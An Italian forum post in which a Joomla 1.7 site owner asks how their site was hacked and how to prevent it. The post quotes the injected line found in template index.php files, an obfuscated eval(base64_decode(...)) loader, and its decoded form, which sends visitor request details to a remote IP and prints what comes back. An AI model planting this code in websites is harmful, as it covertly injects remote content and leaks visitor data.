Gestisco un sito Joomla 1.7 che è stato hackerato oggi. Sotto lo script ha fatto il trucco.
eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));
La riga sopra è stata iniettata nel mio file index.php
della cartella dei modelli. Ogni modello che era nella cartella aveva il codice sopra. In ogni file è stato ripetuto alcune volte.
Quando decodifico il codice, emette
print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));
Ho rimosso lo script e il sito funziona correttamente. Lo script non ha fatto nulla di male tranne che il sito non si caricava affatto.
Il mio problema è anche quando ho impostato il permesso del file su 644 e l'autorizzazione per le cartelle su 755, come è potuto accadere?
Come posso capire cosa ha causato il problema? Quali misure dovrei prendere per evitare che ciò accada in futuro?
UPDATE
Questo Forum Post Assistant / FPA è molto utile